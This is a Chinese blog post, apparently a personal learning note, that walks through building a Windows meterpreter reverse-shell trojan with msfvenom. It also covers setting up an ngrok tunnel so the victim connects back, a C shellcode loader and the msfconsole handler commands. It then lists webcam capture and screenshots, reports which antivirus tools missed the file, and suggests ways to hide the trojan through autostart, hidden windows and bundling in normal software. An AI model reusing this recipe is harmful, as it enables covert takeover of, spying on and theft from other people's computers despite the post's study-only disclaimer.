渗透学习笔记1【metasploit通过exe对他人电脑进行操控】

最新推荐文章于 2024-08-12 16:27:57 发布
最新推荐文章于 2024-08-12 16:27:57 发布
阅读量7.1k 收藏 43
点赞数 12
文章标签: 病毒 木马 渗透测试 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wy_97/article/details/78838186
版权

注:此内容不得用于违法活动,仅供学习交流使用~

最近在学习metaspolit,参考几个大佬的博客,整理实测了metespolit一次渗透~

0X01、木马检测原理

杀毒软件判断病毒木马的方式如下:

  • 特征库扫描法:检查文件中是否存在与常见病毒相同的代码。如果匹配,则说明存在病毒。由于该方法较慢,因此现在一般使用通配符扫描法进行代替。

  • 云扫描法:将可疑文件上传到云服务器进行检查。需要网络连接。

  • 虚拟机脱壳法:使用虚拟机引擎进行文件脱壳(仅支持部分壳类型)。脱壳后的文件将会进一步接受上两种扫描方式的检查。

0X02、环境准备

操作系统用途ip地址
win10被控制的机器
虚拟机kali攻击机192.168.214.129

需要使用的软件:

Hint:前两个kali自带,我用的kali版本为17.01版本

0X03、内网穿透配置

这里使用freebuf一个大佬推荐的工具https://www.ngrok.cc
注册用户->开通隧道->选择ngrok服务器->配置
完成图如下:

这里写图片描述
配置ip和端口的时候,对应的是攻击机的ip,以及发动攻击的端口(任选,别冲突就行),kali使用ifconfig即可查看ip

这里写图片描述

将下载的(我选择的是linux-x64)服务端放到相应目录下,命令

./sunny clientid 隧道id

启动

这里写图片描述

0X04、制作木马后门

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=free.ngrok.cc lport=xxxxx -f c

这里写图片描述

  • windows/meterpreter/reverse_tcp ->大体看出来这是windows下的tcp的一个漏洞(强大的Metaspoit自带多种漏洞,需要什么自行百度就ok)
  • -e x86/shikata_ga_nai ->这是编码方式(我的windows7是64位的,所以要选择对应的编码格式。否则,生成可执行文件再打开时就会出现错误!)
  • -i 5 ->编码次数
  • -b ->就是避免出现的值
  • -f exe ->生成.exe的可执行文件
  • asd.exe > 文件名.exe
  • LHOST ->这是填写自己本机的IP(因为这种木马是用反弹机制)
  • LPORT ->填写自己的端口
#include <stdio.h>
unsignedchar buf[] =
"buf数组";//将复制的数组粘贴到此处
void main()
{
((void(*)(void))&buf)();
}

这里我使用的是codeblocks,build后得到exe
这里写图片描述

启动端口监听

保持之前那个内网穿透服务,重开一个控制台,启动msfconsole

命令如下:
msfconsole
use exploit/multi/handler
set payloadswindows/meterpreter/reverset_tcp
set lhost 192.168.214.129
set lport 12340
exploit

这里写图片描述

被攻击机启动exe

成功渗透

这里写图片描述

两个好玩的命令:

操作系统用途
webcam_snap拍照
截屏screenshot

其他一些好玩的内容可见我的另一个博客

一些结论和思考

  1. 关于病毒的测试:
    1. qq传输文件不报病毒
    2. 360文件检测显示为未知文件,运行不报毒
    3. windows defender文件检测报毒,运行时会强制删除文件
  2. 关于免杀
    1. 因为windows defender的报毒,特地查了一些资料,感觉免杀的思路都是从编码角度,及加自定义壳来思考的
  3. 关于隐藏木马
    1. 考虑添加自启动,运行不显示窗口,在正常软件中加入生成木马的脚本,常驻系统内存等等
  4. 思考
    1. 从个人安全角度来说, 少从为知,不安全的地方下载一些不明软件~
Sp4rkW
关注
专栏目录
黑客是如何通过边界代理一路打到三层内网?如何使用后渗透通用手法进行账号特权提升、写入后门、远程操控个人电脑
代码讲故事
12-06 1369
黑客是如何通过边界代理一路打到三层内网?如何使用后渗透通用手法进行账号特权提升、写入后门、远程操控个人电脑?(附详细图文和源码) 外网进内网通常就是通过web漏洞拿取shell。内网的很大一部分信息收集是围绕网络拓扑图展开的。可以社工运维或者google找一下。 内网扩散信息收集,主要收集内容: 1)系统管理员密码(hash->明文) 2)其他用户的session,3389,ipc连接记录以及各用户回收站信息收集 3)浏览器密码和cookies的获取 4)windows无线密码获取 5)数据库密码获取
利用kali对Windows进行msf渗透(详细介绍)
2302_78587828的博客
09-17 1918
msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。msfvenom支持多种操作系统和架构,包括Windows、Linux、macOS以及各种CPU架构。它可以生成各种类型的恶意软件,如反向连接和绑定Shell、Meterpreter反弹Shell、恶意文档、木马等。
kali系统入侵电脑windows(win11系统)渗透测试,骇入电脑教学
这个博主不懒,但Ta什么也没写~(私信互关24小时必回)
01-27 6427
本次渗透测试将使用kali虚拟机(攻击机)对本机(靶机)进行入侵并监控屏幕。
【2024最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了_metasploit framework下载
最新发布
QIANDXX的博客
08-12 858
为了帮助大家更好的学习网络安全,小编给大家准备了一份网络安全入门/进阶学习资料,里面的内容都是适合零基础小白的笔记和资料,不懂编程也能听懂、看懂,所有资料共282G,朋友们如果有需要全套网络安全入门+进阶学习资源包,可以点击免费领取(如遇扫码问题,可以在评论区留言领取哦)~😝有需要的小伙伴,可以点击下方链接免费领取或者V扫描下方二维码免费领取🆓👉CSDN大礼包🎁:全网最全《网络安全入门&进阶学习资源包》免费分享(安全链接,放心点击)👈。
利用Metasploit控制目标电脑(Win7_x64系统)
qq_46700234的博客
12-28 2374
利用Metasploit控制目标电脑(Win7_x64系统)
Shellter实操——exe文件注入
渗透测试
08-03 1781
Shellter实操 shellter主要功能为入侵PE文件exe),可以将shell代码注入任何32位的本地windows应用程序当中,它允许搭配metasploit框架使用 安装shellter apt-get install shellter 安装完成后,提示符输入shellter打开 成功打开后会出现一个 这里提示可以选择自动(A)手动(M)以及帮助(H),我们选择A 这一步是提供pe目标文件,下面是我自己导入的一个exe文件 大概过个一分钟(或更短)就会提示成功 接下来提示是否选择隐
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8... 渗透测试1.pdf
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
通过阅读《Metasploit渗透测试指南》PDF文件,读者将更深入地了解Metasploit的使用技巧,如何构建和执行渗透测试计划,以及如何利用Metasploit进行有效的安全评估。这份指南不仅适合初学者,也对经验丰富的安全专业...
渗透测试学习笔记资源
08-19
根据提供的文件信息,我们可以深入探讨渗透测试的相关知识点。渗透测试是一种模拟攻击者行为的安全评估方法,旨在识别系统、网络或应用程序中的安全漏洞。通过利用这些漏洞,渗透测试可以帮助组织了解其安全态势,并...
Metasploit渗透测试指南 学习笔记
weixin_56223343的博客
12-04 839
阅读《Metasploit渗透测试指南》读书笔记
web调用exe_WEB安全渗透测试基础知识(八)
weixin_39848097的博客
12-12 239
3.5. 命令注入3.5.1. 简介命令注入通常因为指Web应用在服务器上拼接系统命令而造成的漏洞。该类漏洞通常出现在调用外部程序完成一些功能的情景下。比如一些Web管理界面的配置主机名/IP/掩码/网关、查看系统信息以及关闭重启等功能,或者一些站点提供如ping、nslookup、提供发送邮件、转换图片等功能都可能出现该类漏洞。3.5.2. 常见危险函数3.5.2.1. PHPsystemexe...
445端口入侵详解
热门推荐
无界编程
03-23 7万+
445端口入侵详解   关于“445端口入侵”的内容445端口入侵详解本站搜索更多关于“445端口入侵”的内容 445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口                                                            ipc$一 摘要 二 什么是 ipc$ 三 什么是空会
Metasploit小技巧
weixin_30443813的博客
08-07 301
meterpreter >进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓------------------------------------------------------------------------------------------------用户操作:Stdapi: User i...
exe文件,后门免杀的制作学习笔记
我的学习笔记
02-28 3254
引用原文!!注:本文技术非原创,转载请直接对原文转载,请不要对本文打赏等,本文为学习笔记,禁止由本文产生任何盈利行为。需要(Framework),一般Windows环境都有,C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\csc.exemsfvenom -p windows/meterpreter/revers...
常见的个人电脑入侵方式
实用程序的专栏
09-22 2524
Normal 0 7.8 磅 0 2 常见的个人电脑入侵方式:(1) 被他人盗取密码(2) 系统被木马攻击(3) 浏览网页时被恶意的java scrpit程序攻击(4) QQ被攻击或泄
msf常用命令
licheric的博客
10-20 3128
1、download命令可以下载远程主机上的文件 命令:download文件文件路径to保存的位置 注意:windows路径要使用双斜线【linux向左边,windows向右边】 如果我们需要递归下载整个目录包括子目录和文件,我们可以使用download -r命令 2、在目标主机上执行exe文件 execute -f c://1.exe 3、创建cmd新通道 execute -f cmd -c 4、显示进程 命令:ps 5、获取目标主机的cmd—shell shell命令可以进入目标主
利用Metasploit控制目标电脑
scrawman的博客
01-17 681
MSF高度模块化,是全球最受欢迎的渗透测试工具,涵盖了渗透测试中的全过程
黑客经验
l888888h的专栏
04-16 555
这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的,主要使用的软件就是著名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。其他有兴趣的网络新手们,Lets go!第一步 下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是著名的国产木马冰河2.2的控制端。 下载完毕并解压缩之后跟我进行第二步!第二步 运行1号软件,首先
BackTrack渗透测试实战教程:学习笔记Metasploit详解
"BackTrack渗透测试学习笔记是一份由IceSn0w编写的教程,旨在帮助读者深入了解和学习BackTrack在渗透测试中的应用。BackTrack是一款著名的开源网络安全工具集,主要用于进行渗透测试和网络安全评估。该笔记并非专业...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值